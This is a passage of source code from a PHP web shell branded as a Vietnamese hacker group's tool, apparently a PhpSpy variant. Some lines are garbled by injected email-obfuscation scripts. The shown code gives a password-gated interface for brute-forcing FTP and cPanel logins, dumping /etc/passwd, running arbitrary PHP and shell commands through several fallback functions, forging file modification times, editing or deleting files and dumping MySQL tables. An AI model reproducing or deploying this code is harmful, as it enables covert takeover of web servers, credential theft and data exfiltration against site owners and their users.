1309 /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */ ]# </b><b>Attacking has been done!</a> Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font></b><br>");
1310         }
1311         curl_close($ch);
1312     }
1313     if (isset($submit) && !empty($submit)) {
1314         $userlist = explode("\n", $users);
1315         $passlist = explode("\n", $pass);
1316         p('<b>[ attack@vbateam.net
1317 /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */ ]# Attacking ...</font></b><br>');
1318         foreach ($userlist as $user) {
1319             $_user = trim($user);
1320             foreach ($passlist as $password) {
1321                 $_pass = trim($password);
1322                 if ($option == "ftp") {
1323                     ftp_check($target, $_user, $_pass, $connect_timeout);
1324                 }
1325                 if ($option == "cpanel") {
1326                     cpanel_check($target, $_user, $_pass, $connect_timeout);
1327                 }
1328             }
1329         }
1330     }
1331     formfoot();
1332 } elseif ($action == 'etcpwd') {
1333     formhead(array('title' => 'Get /etc/passwd'));
1334     makehide('action', 'etcpwd');
1335     makehide('dir', $nowpath);
1336     $i = 0;
1337     echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
1338     while ($i < 60000) {
1339         $line = posix_getpwuid($i);
1340         if (!empty($line)) {
1341             while (list($key, $vba_etcpwd) = each($line)) {
1342                 echo "" . $vba_etcpwd . "\n";
1343                 break;
1344             }
1345         }
1346         $i++;
1347     }
1348     echo "</textarea></p>";
1349     formfoot();
1350 } elseif ($action == 'eval') {
1351     $phpcode = trim($phpcode);
1352     if ($phpcode) {
1353         if (!preg_match('#<\?#si', $phpcode)) {
1354             $phpcode = "<?php\n\n{$phpcode}\n\n?>";
1355         }
1356         eval("?" . ">$phpcode<?");
1357     }
1358     formhead(array('title' => 'Eval PHP Code'));
1359     makehide('action', 'eval');
1360     maketext(array('title' => 'PHP Code', 'name' => 'phpcode', 'value' => $phpcode));
1361     p('<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>');
1362     formfooter();
1363 } //end eval
1364 elseif ($action == 'editfile') {
1365     if (file_exists($opfile)) {
1366         $fp = @fopen($opfile, 'r');
1367         $contents = @fread($fp, filesize($opfile));
1368         @fclose($fp);
1369         $contents = htmlspecialchars($contents);
1370     }
1371     formhead(array('title' => 'Create / Edit File'));
1372     makehide('action', 'file');
1373     makehide('dir', $nowpath);
1374     makeinput(array('title' => 'Current File (import new file name and new file)', 'name' => 'editfilename', 'value' => $opfile, 'newline' => 1));
1375     maketext(array('title' => 'File Content', 'name' => 'filecontent', 'value' => $contents));
1376     formfooter();
1377 } //end editfile
1378 elseif ($action == 'newtime') {
1379     $opfilemtime = @filemtime($opfile);
1380     //$time = strtotime("$year-$month-$day $hour:$minute:$second");
1381     $cachemonth = array('January' => 1, 'February' => 2, 'March' => 3, 'April' => 4, 'May' => 5, 'June' => 6, 'July' => 7, 'August' => 8, 'September' => 9, 'October' => 10, 'November' => 11, 'December' => 12);
1382     formhead(array('title' => 'Clone file was last modified time'));
1383     makehide('action', 'file');
1384     makehide('dir', $nowpath);
1385     makeinput(array('title' => 'Alter file', 'name' => 'curfile', 'value' => $opfile, 'size' => 120, 'newline' => 1));
1386     makeinput(array('title' => 'Reference file (fullpath)', 'name' => 'tarfile', 'size' => 120, 'newline' => 1));
1387     formfooter();
1388     formhead(array('title' => 'Set last modified'));
1389     makehide('action', 'file');
1390     makehide('dir', $nowpath);
1391     makeinput(array('title' => 'Current file (fullpath)', 'name' => 'curfile', 'value' => $opfile, 'size' => 120, 'newline' => 1));
1392     p('<p>Instead &raquo;');
1393     p('year:');
1394     makeinput(array('name' => 'year', 'value' => date('Y', $opfilemtime), 'size' => 4));
1395     p('month:');
1396     makeinput(array('name' => 'month', 'value' => date('m', $opfilemtime), 'size' => 2));
1397     p('day:');
1398     makeinput(array('name' => 'day', 'value' => date('d', $opfilemtime), 'size' => 2));
1399     p('hour:');
1400     makeinput(array('name' => 'hour', 'value' => date('H', $opfilemtime), 'size' => 2));
1401     p('minute:');
1402     makeinput(array('name' => 'minute', 'value' => date('i', $opfilemtime), 'size' => 2));
1403     p('second:');
1404     makeinput(array('name' => 'second', 'value' => date('s', $opfilemtime), 'size' => 2));
1405     p('</p>');
1406     formfooter();
1407 } //end newtime
1408 elseif ($action == 'shell') {
1409     if (IS_WIN && IS_COM) {
1410         if ($program && $parameter) {
1411             $shell = new COM('Shell.Application');
1412             $a = $shell->ShellExecute($program, $parameter);
1413             m('Program run has ' . (!$a ? 'success' : 'fail'));
1414         }
1415         !$program && $program = 'c:\windows\system32\cmd.exe';
1416         !$parameter && $parameter = '/c net start > ' . SA_ROOT . 'log.txt';
1417         formhead(array('title' => 'Execute Program'));
1418         makehide('action', 'shell');
1419         makeinput(array('title' => 'Program', 'name' => 'program', 'value' => $program, 'newline' => 1));
1420         p('<p>');
1421         makeinput(array('title' => 'Parameter', 'name' => 'parameter', 'value' => $parameter));
1422         makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
1423         p('</p>');
1424         formfoot();
1425     }
1426     formhead(array('title' => 'Execute Command'));
1427     makehide('action', 'shell');
1428     if (IS_WIN && IS_COM) {
1429         $execfuncdb = array('phpfunc' => 'phpfunc', 'wscript' => 'wscript', 'proc_open' => 'proc_open');
1430         makeselect(array('title' => 'Use:', 'name' => 'execfunc', 'option' => $execfuncdb, 'selected' => $execfunc, 'newline' => 1));
1431     }
1432     p('<p>');
1433     makeinput(array('title' => 'Command', 'name' => 'command', 'value' => $command));
1434     makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
1435     p('</p>');
1436     formfoot();
1437     if ($command) {
1438         p('<hr width="100%" noshade /><pre>');
1439         if ($execfunc == 'wscript' && IS_WIN && IS_COM) {
1440             $wsh = new COM('WScript.shell');
1441             $exec = $wsh->exec('cmd.exe /c ' . $command);
1442             $stdout = $exec->StdOut();
1443             $stroutput = $stdout->ReadAll();
1444             echo $stroutput;
1445         } elseif ($execfunc == 'proc_open' && IS_WIN && IS_COM) {
1446             $descriptorspec = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w'));
1447             $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
1448             if (is_resource($process)) {
1449                 fwrite($pipes[0], $command . "\r\n");
1450                 fwrite($pipes[0], "exit\r\n");
1451                 fclose($pipes[0]);
1452                 while (!feof($pipes[1])) {
1453                     echo fgets($pipes[1], 1024);
1454                 }
1455                 fclose($pipes[1]);
1456                 while (!feof($pipes[2])) {
1457                     echo fgets($pipes[2], 1024);
1458                 }
1459                 fclose($pipes[2]);
1460                 proc_close($process);
1461             }
1462         } else {
1463             echo (execute($command));
1464         }
1465         p('</pre>');
1466     }
1467 } //end shell
1468 elseif ($action == 'phpenv') {
1469     $upsize = getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
1470     $adminmail = isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
1471     !$dis_func && $dis_func = 'No';
1472     $info = array(1 => array('Server Time', date('Y/m/d h:i:s', $timestamp)), 2 => array('Server Domain', $_SERVER['SERVER_NAME']), 3 => array('Server IP', gethostbyname($_SERVER['SERVER_NAME'])), 4 => array('Server OS', PHP_OS), 5 => array('Server OS Charset', $_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array('Server Software', $_SERVER['SERVER_SOFTWARE']), 7 => array('Server Web Port', $_SERVER['SERVER_PORT']), 8 => array('PHP run mode', strtoupper(php_sapi_name())), 9 => array('The file path', __FILE__), 10 => array('PHP Version', PHP_VERSION), 11 => array('PHPINFO', (IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')), 12 => array('Safe Mode', getcfg('safe_mode')), 13 => array('Administrator', $adminmail), 14 => array('allow_url_fopen', getcfg('allow_url_fopen')), 15 => array('enable_dl', getcfg('enable_dl')), 16 => array('display_errors', getcfg('display_errors')), 17 => array('register_globals', getcfg('register_globals')), 18 => array('magic_quotes_gpc', getcfg('magic_quotes_gpc')), 19 => array('memory_limit', getcfg('memory_limit')), 20 => array('post_max_size', getcfg('post_max_size')), 21 => array('upload_max_filesize', $upsize), 22 => array('max_execution_time', getcfg('max_execution_time') . ' second(s)'), 23 => array('disable_functions', $dis_func),);
1473     if ($phpvarname) {
1474         m($phpvarname . ' : ' . getcfg($phpvarname));
1475     }
1476     formhead(array('title' => 'Server environment'));
1477     makehide('action', 'phpenv');
1478     makeinput(array('title' => 'Please input PHP configuration parameter(eg:magic_quotes_gpc)', 'name' => 'phpvarname', 'value' => $phpvarname, 'newline' => 1));
1479     formfooter();
1480     $hp = array(0 => 'Server', 1 => 'PHP');
1481     for ($a = 0;$a < 2;$a++) {
1482         p('<h2>' . $hp[$a] . ' &raquo;</h2>');
1483         p('<ul class="info">');
1484         if ($a == 0) {
1485             for ($i = 1;$i <= 9;$i++) {
1486                 p('<li><u>' . $info[$i][0] . ':</u>' . $info[$i][1] . '</li>');
1487             }
1488         } elseif ($a == 1) {
1489             for ($i = 10;$i <= 23;$i++) {
1490                 p('<li><u>' . $info[$i][0] . ':</u>' . $info[$i][1] . '</li>');
1491             }
1492         }
1493         p('</ul>');
1494     }
1495 } //end phpenv
1496 else {
1497     m('Undefined Action');
1498 }
1499 ?>
1500 </td></tr></table>
1501 <div style="padding:10px;border-bottom:1px solid #0E0E0E;border-top:1px solid #0E0E0E;background:#0E0E0E;">
1502    <span style="float:right;"><?php debuginfo();
1503 ob_end_flush(); ?></span>
1504    Copyright (C) 2004-2010 <B></B> - Develop by <a href=http://beyeugroup.com target=_blank><B>BYG   </B></a> - <B>- The Legend of Vietnamese Hacker World</B> All Rights Reserved.
1505 </div>
1506 </body>
1507 </html>
1508 
1509 <?php
1510 /*======================================================
1511 Show info shell
1512 ======================================================*/
1513 function m($msg) {
1514     echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
1515     echo $msg;
1516     echo '</div>';
1517 }
1518 function scookie($key, $value, $life = 0, $prefix = 1) {
1519     global $admin, $timestamp, $_SERVER;
1520     $key = ($prefix ? $admin['cookiepre'] : '') . $key;
1521     $life = $life ? $life : $admin['cookielife'];
1522     $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
1523     setcookie($key, $value, $timestamp + $life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
1524 }
1525 function multi($num, $perpage, $curpage, $tablename) {
1526     $multipage = '';
1527     if ($num > $perpage) {
1528         $page = 10;
1529         $offset = 5;
1530         $pages = @ceil($num / $perpage);
1531         if ($page > $pages) {
1532             $from = 1;
1533             $to = $pages;
1534         } else {
1535             $from = $curpage - $offset;
1536             $to = $curpage + $page - $offset - 1;
1537             if ($from < 1) {
1538                 $to = $curpage + 1 - $from;
1539                 $from = 1;
1540                 if (($to - $from) < $page && ($to - $from) < $pages) {
1541                     $to = $page;
1542                 }
1543             } elseif ($to > $pages) {
1544                 $from = $curpage - $pages + $to;
1545                 $to = $pages;
1546                 if (($to - $from) < $page && ($to - $from) < $pages) {
1547                     $from = $pages - $page + 1;
1548                 }
1549             }
1550         }
1551         $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', 1);">First</a> ' : '') . ($curpage > 1 ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . ($curpage - 1) . ');">Prev</a> ' : '');
1552         for ($i = $from;$i <= $to;$i++) {
1553             $multipage.= $i == $curpage ? $i . ' ' : '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . $i . ');">[' . $i . ']</a> ';
1554         }
1555         $multipage.= ($curpage < $pages ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . ($curpage + 1) . ');">Next</a>' : '') . ($to < $pages ? ' <a href="javascript:settable(\'' . $tablename . '\', \'\', ' . $pages . ');">Last</a>' : '');
1556         $multipage = $multipage ? '<p>Pages: ' . $multipage . '</p>' : '';
1557     }
1558     return $multipage;
1559 }
1560 // Login page
1561 function loginpage() {
1562 ?>
1563 <html>
1564 <head>
1565 
1566 <body bgcolor=black background=1.jpg>
1567 
1568        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1569 <title>BYG - The Legend of Vietnamese Hacker World </title>
1570 <style type="text/css">
1571 A:link {text-decoration: none; color: green }
1572 A:visited {text-decoration: none;color:red}
1573 A:active {text-decoration: none}
1574 A:hover {text-decoration: underline; color: green;}
1575 input, textarea, button
1576 {
1577    font-size: 11pt;
1578    color:  #FFFFFF;
1579    font-family: verdana, sans-serif;
1580    background-color: #000000;
1581    border-left: 2px dashed #8B0000;
1582    border-top: 2px dashed #8B0000;
1583    border-right: 2px dashed #8B0000;
1584    border-bottom: 2px dashed #8B0000;
1585 }
1586 
1587 </style>
1588 
1589        <BR><BR>
1590 <div align=center >
1591 
1592 <div>
1593 <font color=gray>
1594 <br /><br /><br /><br /><br />
1595 
1596 <form method="POST" action="">
1597    <span style="font:20pt tahoma;"> </span><input name="password" type="password" size="30">
1598    <input type="hidden" name="doing" value="login">
1599    <input type="submit" value="Login">
1600    </form>
1601 <BR>
1602 <?php
1603     echo "" . $err_mess . "";
1604 ?>
1605 
1606    <B><font color=red>
1607 
1608 
1609 
1610 
1611 
1612 
1613 </div>
1614 
1615 
1616    </fieldset>
1617 
1618 
1619 
1620 </head>
1621 </html>
1622 
1623 
1624 <?php
1625     exit;
1626 } //end loginpage()
1627 function execute($cfe) {
1628     $res = '';
1629     if ($cfe) {
1630         if (function_exists('exec')) {
1631             @exec($cfe, $res);
1632             $res = join("\n", $res);
1633         } elseif (function_exists('shell_exec')) {
1634             $res = @shell_exec($cfe);
1635         } elseif (function_exists('system')) {
1636             @ob_start();
1637             @system($cfe);
1638             $res = @ob_get_contents();
1639             @ob_end_clean();
1640         } elseif (function_exists('passthru')) {
1641             @ob_start();
1642             @passthru($cfe);
1643             $res = @ob_get_contents();
1644             @ob_end_clean();
1645         } elseif (@is_resource($f = @popen($cfe, "r"))) {
1646             $res = '';
1647             while (!@feof($f)) {
1648                 $res.= @fread($f, 1024);
1649             }
1650             @pclose($f);
1651         }
1652     }
1653     return $res;
1654 }
1655 function which($pr) {
1656     $path = execute("which $pr");
1657     return ($path ? $path : $pr);
1658 }
1659 function cf($fname, $text) {
1660     if ($fp = @fopen($fname, 'w')) {
1661         @fputs($fp, base64_decode($text));
1662         @fclose($fp);
1663     }
1664 }
1665 // Debug
1666 function debuginfo() {
1667     global $starttime;
1668     $mtime = explode(' ', microtime());
1669     $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
1670     echo 'Processed in ' . $totaltime . ' second(s)';
1671 }
1672 // Function connect database
1673 function dbconn($dbhost, $dbuser, $dbpass, $dbname = '', $charset = '', $dbport = '3306') {
1674     if (!$link = @mysql_connect($dbhost . ':' . $dbport, $dbuser, $dbpass)) {
1675         p('<h2>Can not connect to MySQL server</h2>');
1676         exit;
1677     }
1678     if ($link && $dbname) {
1679         if (!@mysql_select_db($dbname, $link)) {
1680             p('<h2>Database selected has error</h2>');
1681             exit;
1682         }
1683     }
1684     if ($link && mysql_get_server_info() > '4.1') {
1685         if (in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
1686             q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
1687         }
1688     }
1689     return $link;
1690 }
1691 // Array strip
1692 function s_array(&$array) {
1693     if (is_array($array)) {
1694         foreach ($array as $k => $v) {
1695             $array[$k] = s_array($v);
1696         }
1697     } else if (is_string($array)) {
1698         $array = stripslashes($array);
1699     }
1700     return $array;
1701 }
1702 // HTML Strip
1703 function html_clean($content) {
1704     $content = htmlspecialchars($content);
1705     $content = str_replace("\n", "<br />", $content);
1706     $content = str_replace("  ", "&nbsp;&nbsp;", $content);
1707     $content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
1708     return $content;
1709 }
1710 // Chmod
1711 function getChmod($filepath) {
1712     return substr(base_convert(@fileperms($filepath), 10, 8), -4);
1713 }
1714 function getPerms($filepath) {
1715     $mode = @fileperms($filepath);
1716     if (($mode & 0xC000) === 0xC000) {
1717         $type = 's';
1718     } elseif (($mode & 0x4000) === 0x4000) {
1719         $type = 'd';
1720     } elseif (($mode & 0xA000) === 0xA000) {
1721         $type = 'l';
1722     } elseif (($mode & 0x8000) === 0x8000) {
1723         $type = '-';
1724     } elseif (($mode & 0x6000) === 0x6000) {
1725         $type = 'b';
1726     } elseif (($mode & 0x2000) === 0x2000) {
1727         $type = 'c';
1728     } elseif (($mode & 0x1000) === 0x1000) {
1729         $type = 'p';
1730     } else {
1731         $type = '?';
1732     }
1733     $owner['read'] = ($mode & 00400) ? 'r' : '-';
1734     $owner['write'] = ($mode & 00200) ? 'w' : '-';
1735     $owner['execute'] = ($mode & 00100) ? 'x' : '-';
1736     $group['read'] = ($mode & 00040) ? 'r' : '-';
1737     $group['write'] = ($mode & 00020) ? 'w' : '-';
1738     $group['execute'] = ($mode & 00010) ? 'x' : '-';
1739     $world['read'] = ($mode & 00004) ? 'r' : '-';
1740     $world['write'] = ($mode & 00002) ? 'w' : '-';
1741     $world['execute'] = ($mode & 00001) ? 'x' : '-';
1742     if ($mode & 0x800) {
1743         $owner['execute'] = ($owner['execute'] == 'x') ? 's' : 'S';
1744     }
1745     if ($mode & 0x400) {
1746         $group['execute'] = ($group['execute'] == 'x') ? 's' : 'S';
1747     }
1748     if ($mode & 0x200) {
1749         $world['execute'] = ($world['execute'] == 'x') ? 't' : 'T';
1750     }
1751     return $type . $owner['read'] . $owner['write'] . $owner['execute'] . $group['read'] . $group['write'] . $group['execute'] . $world['read'] . $world['write'] . $world['execute'];
1752 }
1753 function getUser($filepath) {
1754     if (function_exists('posix_getpwuid')) {
1755         $array = @posix_getpwuid(@fileowner($filepath));
1756         if ($array && is_array($array)) {
1757             return ' / <a href="#" title="User: ' . $array['name'] . '&#13&#10Passwd: ' . $array['passwd'] . '&#13&#10Uid: ' . $array['uid'] . '&#13&#10gid: ' . $array['gid'] . '&#13&#10Gecos: ' . $array['gecos'] . '&#13&#10Dir: ' . $array['dir'] . '&#13&#10Shell: ' . $array['shell'] . '">' . $array['name'] . '</a>';
1758         }
1759     }
1760     return '';
1761 }
1762 // Delete dir
1763 function deltree($deldir) {
1764     $mydir = @dir($deldir);
1765     while ($file = $mydir->read()) {
1766         if ((is_dir($deldir . '/' . $file)) && ($file != '.') && ($file != '..')) {
1767             @chmod($deldir . '/' . $file, 0777);
1768             deltree($deldir . '/' . $file);
1769         }
1770         if (is_file($deldir . '/' . $file)) {
1771             @chmod($deldir . '/' . $file, 0777);
1772             @unlink($deldir . '/' . $file);
1773         }
1774     }
1775     $mydir->close();
1776     @chmod($deldir, 0777);
1777     return @rmdir($deldir) ? 1 : 0;
1778 }
1779 // Background
1780 function bg() {
1781     global $bgc;
1782     return ($bgc++ % 2 == 0) ? 'alt1' : 'alt2';
1783 }
1784 // Get path
1785 function getPath($scriptpath, $nowpath) {
1786     if ($nowpath == '.') {
1787         $nowpath = $scriptpath;
1788     }
1789     $nowpath = str_replace('\\', '/', $nowpath);
1790     $nowpath = str_replace('//', '/', $nowpath);
1791     if (substr($nowpath, -1) != '/') {
1792         $nowpath = $nowpath . '/';
1793     }
1794     return $nowpath;
1795 }
1796 // Get up path
1797 function getUpPath($nowpath) {
1798     $pathdb = explode('/', $nowpath);
1799     $num = count($pathdb);
1800     if ($num > 2) {
1801         unset($pathdb[$num - 1], $pathdb[$num - 2]);
1802     }
1803     $uppath = implode('/', $pathdb) . '/';
1804     $uppath = str_replace('//', '/', $uppath);
1805     return $uppath;
1806 }
1807 // Config
1808 function getcfg($varname) {
1809     $result = get_cfg_var($varname);
1810     if ($result == 0) {
1811         return 'No';
1812     } elseif ($result == 1) {
1813         return 'Yes';
1814     } else {
1815         return $result;
1816     }
1817 }
1818 // Function name
1819 function getfun($funName) {
1820     return (false !== function_exists($funName)) ? 'Yes' : 'No';
1821 }
1822 function GetList($dir) {
1823     global $dirdata, $j, $nowpath;
1824     !$j && $j = 1;
1825     if ($dh = opendir($dir)) {
1826         while ($file = readdir($dh)) {
1827             $f = str_replace('//', '/', $dir . '/' . $file);
1828             if ($file != '.' && $file != '..' && is_dir($f)) {
1829                 if (is_writable($f)) {
1830                     $dirdata[$j]['filename'] = str_replace($nowpath, '', $f);
1831                     $dirdata[$j]['mtime'] = @date('Y-m-d H:i:s', filemtime($f));
1832                     $dirdata[$j]['dirchmod'] = getChmod($f);
1833                     $dirdata[$j]['dirperm'] = getPerms($f);
1834                     $dirdata[$j]['dirlink'] = ue($dir);
1835                     $dirdata[$j]['server_link'] = $f;
1836                     $dirdata[$j]['client_link'] = ue($f);
1837                     $j++;
1838                 }
1839                 GetList($f);
1840             }
1841         }
1842         closedir($dh);
1843         clearstatcache();
1844         return $dirdata;
1845     } else {
1846         return array();
1847     }
1848 }
1849 function qy($sql) {
1850     //echo $sql.'<br>';
1851     $res = $error = '';
1852     if (!$res = @mysql_query($sql)) {
1853         return 0;
1854     } else if (is_resource($res)) {
1855         return 1;
1856     } else {
1857         return 2;
1858     }
1859     return 0;
1860 }
1861 function q($sql) {
1862     return @mysql_query($sql);
1863 }
1864 function fr($qy) {
1865     mysql_free_result($qy);
1866 }
1867 function sizecount($size) {
1868     if ($size > 1073741824) {
1869         $size = round($size / 1073741824 * 100) / 100 . ' G';
1870     } elseif ($size > 1048576) {
1871         $size = round($size / 1048576 * 100) / 100 . ' M';
1872     } elseif ($size > 1024) {
1873         $size = round($size / 1024 * 100) / 100 . ' K';
1874     } else {
1875         $size = $size . ' B';
1876     }
1877     return $size;
1878 }
1879 // Zip
1880 class PHPZip {
1881     var $out = '';
1882     function PHPZip($dir) {
1883         if (@function_exists('gzcompress')) {
1884             $curdir = getcwd();
1885             if (is_array($dir)) $filelist = $dir;
1886             else {
1887                 $filelist = $this->GetFileList($dir); //File list
1888                 foreach ($filelist as $k => $v) $filelist[] = substr($v, strlen($dir) + 1);
1889             }
1890             if ((!empty($dir)) && (!is_array($dir)) && (file_exists($dir))) chdir($dir);
1891             else chdir($curdir);
1892             if (count($filelist) > 0) {
1893                 foreach ($filelist as $filename) {
1894                     if (is_file($filename)) {
1895                         $fd = fopen($filename, 'r');
1896                         $content = @fread($fd, filesize($filename));
1897                         fclose($fd);
1898                         if (is_array($dir)) $filename = basename($filename);
1899                         $this->addFile($content, $filename);
1900                     }
1901                 }
1902                 $this->out = $this->file();
1903                 chdir($curdir);
1904             }
1905             return 1;
1906         } else return 0;
1907     }
1908     // Show file list
1909     function GetFileList($dir) {
1910         static $a;
1911         if (is_dir($dir)) {
1912             if ($dh = opendir($dir)) {
1913                 while ($file = readdir($dh)) {
1914                     if ($file != '.' && $file != '..') {
1915                         $f = $dir . '/' . $file;
1916                         if (is_dir($f)) $this->GetFileList($f);
1917                         $a[] = $f;
1918                     }
1919                 }
1920                 closedir($dh);
1921             }
1922         }
1923         return $a;
1924     }
1925     var $datasec = array();
1926     var $ctrl_dir = array();
1927     var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
1928     var $old_offset = 0;
1929     function unix2DosTime($unixtime = 0) {
1930         $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
1931         if ($timearray['year'] < 1980) {
1932             $timearray['year'] = 1980;
1933             $timearray['mon'] = 1;
1934             $timearray['mday'] = 1;
1935             $timearray['hours'] = 0;
1936             $timearray['minutes'] = 0;
1937             $timearray['seconds'] = 0;
1938         } // end if
1939         return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
1940     }
1941     function addFile($data, $name, $time = 0) {
1942         $name = str_replace('\\', '/', $name);
1943         $dtime = dechex($this->unix2DosTime($time));
1944         $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1];
1945         eval('$hexdtime = "' . $hexdtime . '";');
1946         $fr = "\x50\x4b\x03\x04";
1947         $fr.= "\x14\x00";
1948         $fr.= "\x00\x00";
1949         $fr.= "\x08\x00";
1950         $fr.= $hexdtime;
1951         $unc_len = strlen($data);
1952         $crc = crc32($data);
1953         $zdata = gzcompress($data);
1954         $c_len = strlen($zdata);
1955         $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
1956         $fr.= pack('V', $crc);
1957         $fr.= pack('V', $c_len);
1958         $fr.= pack('V', $unc_len);
1959         $fr.= pack('v', strlen($name));
1960         $fr.= pack('v', 0);
1961         $fr.= $name;
1962         $fr.= $zdata;
1963         $fr.= pack('V', $crc);
1964         $fr.= pack('V', $c_len);
1965         $fr.= pack('V', $unc_len);
1966         $this->datasec[] = $fr;
1967         $new_offset = strlen(implode('', $this->datasec));
1968         $cdrec = "\x50\x4b\x01\x02";
1969         $cdrec.= "\x00\x00";
1970         $cdrec.= "\x14\x00";
1971         $cdrec.= "\x00\x00";
1972         $cdrec.= "\x08\x00";
1973         $cdrec.= $hexdtime;
1974         $cdrec.= pack('V', $crc);
1975         $cdrec.= pack('V', $c_len);
1976         $cdrec.= pack('V', $unc_len);
1977         $cdrec.= pack('v', strlen($name));
1978         $cdrec.= pack('v', 0);
1979         $cdrec.= pack('v', 0);
1980         $cdrec.= pack('v', 0);
1981         $cdrec.= pack('v', 0);
1982         $cdrec.= pack('V', 32);
1983         $cdrec.= pack('V', $this->old_offset);
1984         $this->old_offset = $new_offset;
1985         $cdrec.= $name;
1986         $this->ctrl_dir[] = $cdrec;
1987     }
1988     function file() {
1989         $data = implode('', $this->datasec);
1990         $ctrldir = implode('', $this->ctrl_dir);
1991         return $data . $ctrldir . $this->eof_ctrl_dir . pack('v', sizeof($this->ctrl_dir)) . pack('v', sizeof($this->ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
1992     }
1993 }
1994 // Dump mysql
1995 function sqldumptable($table, $fp = 0) {
1996     $tabledump = "DROP TABLE IF EXISTS $table;\n";
1997     $tabledump.= "CREATE TABLE $table (\n";
1998     $firstfield = 1;
1999     $fields = q("SHOW FIELDS FROM $table");
2000     while ($field = mysql_fetch_array($fields)) {
2001         if (!$firstfield) {
2002             $tabledump.= ",\n";
2003         } else {
2004             $firstfield = 0;
2005         }
2006         $tabledump.= "   $field[Field] $field[Type]";
2007         if (!empty($field["Default"])) {
2008             $tabledump.= " DEFAULT '$field[Default]'";
2009         }
2010         if ($field['Null'] != "YES") {
2011             $tabledump.= " NOT NULL";
2012         }
2013         if ($field['Extra'] != "") {
2014             $tabledump.= " $field[Extra]";
2015         }
2016     }
2017     fr($fields);
2018     $keys = q("SHOW KEYS FROM $table");
2019     while ($key = mysql_fetch_array($keys)) {
2020         $kname = $key['Key_name'];
2021         if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
2022             $kname = "UNIQUE|$kname";
2023         }
2024         if (!is_array($index[$kname])) {
2025             $index[$kname] = array();
2026         }
2027         $index[$kname][] = $key['Column_name'];
2028     }
2029     fr($keys);
2030     while (list($kname, $columns) = @each($index)) {
2031         $tabledump.= ",\n";
2032         $colnames = implode($columns, ",");
2033         if ($kname == "PRIMARY") {
2034             $tabledump.= "   PRIMARY KEY ($colnames)";
2035         } else {
2036             if (substr($kname, 0, 6) == "UNIQUE") {
2037                 $kname = substr($kname, 7);
2038             }
2039             $tabledump.= "   KEY $kname ($colnames)";
2040         }
2041     }
2042     $tabledump.= "\n);\n\n";
2043     if ($fp) {
2044         fwrite($fp, $tabledump);
2045     } else {
2046         echo $tabledump;
2047     }
2048     $rows = q("SELECT * FROM $table");
2049     $numfields = mysql_num_fields($rows);
2050     while ($row = mysql_fetch_array($rows)) {
2051         $tabledump = "INSERT INTO $table VALUES(";
2052         $fieldcounter = - 1;
2053         $firstfield = 1;
2054         while (++$fieldcounter < $numfields) {
2055             if (!$firstfield) {
2056                 $tabledump.= ", ";
2057             } else {
2058                 $firstfield = 0;
2059             }
2060             if (!isset($row[$fieldcounter])) {
2061                 $tabledump.= "NULL";
2062             } else {
2063                 $tabledump.= "'" . mysql_escape_string($row[$fieldcounter]) . "'";
2064             }
2065         }
2066         $tabledump.= ");\n";
2067         if ($fp) {
2068             fwrite($fp, $tabledump);
2069         } else {
2070             echo $tabledump;
2071         }
2072     }
2073     fr($rows);
2074     if ($fp) {
2075         fwrite($fp, "\n");
2076     } else {
2077         echo "\n";
2078     }
2079 }
2080 function ue($str) {
2081     return urlencode($str);
